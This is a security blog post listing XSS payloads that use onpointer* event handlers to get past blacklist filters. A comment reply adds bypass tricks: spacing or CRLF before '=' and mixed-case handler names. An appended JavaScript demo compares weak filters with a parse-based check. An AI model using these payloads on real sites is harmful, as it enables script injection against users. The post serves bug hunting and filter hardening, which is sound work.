7/31/2019

onpointer* XSS payloads for bypassing blacklist-based event-handler XSS filters

Hi hackers.
I crafted XSS payloads that bypass event-handler blacklists. It is just a simple trick.

onpointer* is a family of event handlers for pointing devices (mouse, pen and touch, e.g. tablets). They behave much like onmouse*, and because they are missing from common cheat sheets they can be used to bypass blacklist-based XSS filters.


There is a set of event handlers whose names start with onpointer*. They work much like onmouse*, and while testing I found that XSS is possible through them, so I am writing it up as a blog post. (Reading only the TL;DR is fine.)


<div onpointerover="alert(45)">this is onpointerover=alert(45)</div>


TL;DR (XSS Payloads)

<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>

What is onpointer*?

onpointer* is the set of event handlers for pointing devices.
Details: https://www.w3.org/TR/pointerevents/

I originally understood these as handlers for pointing devices such as a mouse (this part is a little ambiguous).
In any case, a pointing device is effectively treated much like a mouse, so the way the events are triggered is almost the same: when the pointer is over an element, passes over it, moves, and so on. They are the handlers that receive those pointing events. See the link above for details.

Pointer event handlers
* onpointercancel
* onpointerdown
* onpointerenter
* onpointerleave
* onpointermove
* onpointerout
* onpointerover
* onpointerup
* ongotpointercapture
* onlostpointercapture

The TL;DR uses only the seven that fire from ordinary mouse movement and clicks. onpointercancel fires when the browser aborts the pointer (for example a touch that turns into a scroll), and the two capture handlers fire when an element gains or loses pointer capture, so they are not triggered by simply hovering.

onpointer* testing for XSS

Every handler below fired with an ordinary mouse, so no pen or touch device is needed. Each pointer event mirrors the mouse event of the same name:

onpointerover
=> triggered by hovering over the element (same gesture as mouseover)

onpointerdown
=> triggered by pressing the mouse button, i.e. the first half of a click (same as mousedown)

onpointerenter
=> triggered when the pointer enters the element (same as mouseenter; does not bubble)

onpointerleave
=> triggered when the pointer leaves the element (same as mouseleave; does not bubble)

onpointermove
=> triggered by any pointer movement over the element (same as mousemove)

onpointerout
=> triggered when the pointer moves off the element (same as mouseout)

onpointerup
=> triggered by releasing the mouse button (same as mouseup)

Valid payloads
<div onpointerover="alert(45)">hahwul(45)</div>
<div onpointerdown="alert(45)">hahwul(45)</div>
<div onpointerenter="alert(45)">hahwul(45)</div>
<div onpointerleave="alert(45)">hahwul(45)</div>
<div onpointermove="alert(45)">hahwul(45)</div>
<div onpointerout="alert(45)">hahwul(45)</div>
<div onpointerup="alert(45)">hahwul(45)</div>



Other cheatsheets

OWASP
* onAfterPrint() (activates after user prints or previews print job)
* onAfterUpdate() (activates on data object after updating data in the source object)
* onBeforeActivate() (fires before the object is set as the active element)
* onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function)
* onBeforeCut() (attacker executes the attack string right before a selection is cut)
* onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
* onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
* onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
* onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function).
* onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
* onBeforeUpdate() (activates on data object before updating data in the source object)

Payload all the things
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>

Conclusion

A blacklist built from these documents (OWASP, Payload all the things) can be bypassed, because at the time of writing neither of them lists the onpointer* handlers.

Since HTML5 there are a great many event handlers and tags, far more than any cheat sheet tracks, so a filter needs broad testing. A blacklist of specific handler names will always lag behind the browser; rejecting any attribute whose name starts with "on", after proper parsing, holds up better than a fixed list.

It’s a simple trick, but hope it helps!
happy bug hunting and security engineering.

byebye!


Reference

https://www.w3.org/TR/pointerevents/


HAHWUL

Security engineer, Gopher and H4cker!


3 comments:

  1. But what if all the onxxx... are filtered?

    1. It is difficult to bypass unless there is a problem in the verification logic itself (such as a regular-expression mistake). If "on*" is filtered, you test for developer mistakes or wild XSS vectors.
      Sample cases:

      on***= (if the pattern is on***=)
      => on*** =
      => on***(%0d%0a)=

      on*** (if lowercase only)
      => OnLoAd

      Depending on the verification method, there can be many bypass cases.

  2. I sent a PR to PortSwigger at that time, and I hope the 2020 release will come soon.
    https://github.com/PortSwigger/xss-cheatsheet-data/pull/6
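Added example (JavaScript, not code from hahwul's post or from either cheat sheet): a blacklist filter of the kind the conclusion describes, built from handler names in the OWASP and Payload all the things excerpts above, probed with the post's onpointer* payloads and with the regex-shape variants from the comment reply (space or CRLF before "=", mixed case). The handler list, the probe strings, the two weak filters and the hardened attributeNames scanner are all constructed for this illustration; the scanner is not a full HTML parser, and a production sanitizer should parse with a real HTML parser and allowlist attributes rather than blacklist them.

```javascript
// Added example, not from the original post. Everything here is constructed
// for illustration: the blacklist, the probe payloads and the scanner.

// Handler names a cheat-sheet-derived blacklist might contain (constructed
// from the OWASP / "Payload all the things" excerpts plus common onmouse*).
// Deliberately incomplete: it knows nothing about onpointer*.
const CHEATSHEET_HANDLERS = [
  "onafterprint", "onafterupdate", "onbeforeactivate", "onbeforecopy",
  "onbeforecut", "onbeforedeactivate", "onbeforeeditfocus", "onbeforepaste",
  "onbeforeprint", "onbeforeunload", "onbeforeupdate",
  "onafterscriptexecute", "onbeforescriptexecute",
  "onclick", "onload", "onerror", "onmouseover", "onmouseout",
  "onmouseenter", "onmouseleave", "onmousemove", "onmousedown", "onmouseup",
];

// Weak filter 1: exact-name blacklist, matched as lowercase "name=".
// Misses unlisted handlers (onpointer*) and any spacing/case variation.
function weakBlacklist(html) {
  return CHEATSHEET_HANDLERS.some((h) => html.includes(h + "="));
}

// Weak filter 2: generic "on<letters>=" pattern. Catches onpointer*, but
// HTML allows whitespace (including CR/LF) before "=" and attribute names
// are case-insensitive, so "onerror =" and "OnLoAd=" slip through.
function weakGenericPattern(html) {
  return /on[a-z]+=/.test(html);
}

// Minimal attribute-name scanner: walks each tag, skips quoted values so a
// ">" inside a value cannot end the tag early, tolerates whitespace around
// "=", and returns attribute names lower-cased. Not a full HTML parser.
function attributeNames(html) {
  const names = [];
  let i = 0;
  while ((i = html.indexOf("<", i)) !== -1) {
    i++;
    if (html[i] === "/") i++;                                   // closing tag
    while (i < html.length && !/[\s\/>]/.test(html[i])) i++;   // tag name
    while (i < html.length && html[i] !== ">") {
      if (/[\s\/]/.test(html[i])) { i++; continue; }
      let name = "";
      while (i < html.length && !/[\s\/=>]/.test(html[i])) name += html[i++];
      while (i < html.length && /\s/.test(html[i])) i++;       // ws before "="
      if (html[i] === "=") {
        i++;
        while (i < html.length && /\s/.test(html[i])) i++;     // ws after "="
        const q = html[i];
        if (q === '"' || q === "'") {
          const end = html.indexOf(q, i + 1);                   // quoted value
          i = end === -1 ? html.length : end + 1;
        } else {
          while (i < html.length && !/[\s>]/.test(html[i])) i++; // unquoted
        }
      }
      if (name) names.push(name.toLowerCase());
    }
  }
  return names;
}

// Hardened check: reject any attribute whose parsed name starts with "on",
// whatever the handler is called and however it is spaced or cased.
function hardenedCheck(html) {
  return attributeNames(html).some((n) => n.startsWith("on"));
}

// Constructed probes: the post's onpointer* payloads, then the
// regex-shape variants from the comment thread applied to a listed handler.
const PROBES = [
  '<div onpointerover="alert(45)">hahwul(45)</div>',
  '<div onpointerdown="alert(45)">hahwul(45)</div>',
  '<img src=x onerror =alert(45)>',        // space before "="
  '<img src=x onerror\r\n=alert(45)>',     // CRLF (%0d%0a) before "="
  '<body OnLoAd=alert(45)>',               // mixed case
];

// Returns one boolean per probe: true means the filter blocked it.
function evaluate(filter) {
  return PROBES.map((p) => filter(p));
}

for (const f of [weakBlacklist, weakGenericPattern, hardenedCheck]) {
  console.log(f.name, evaluate(f));
}
```

Run with node: the exact-name blacklist blocks none of the five probes, the generic on*= pattern blocks only the two onpointer* payloads, and the parse-then-check version blocks all five while leaving an "onload" string inside an attribute value alone.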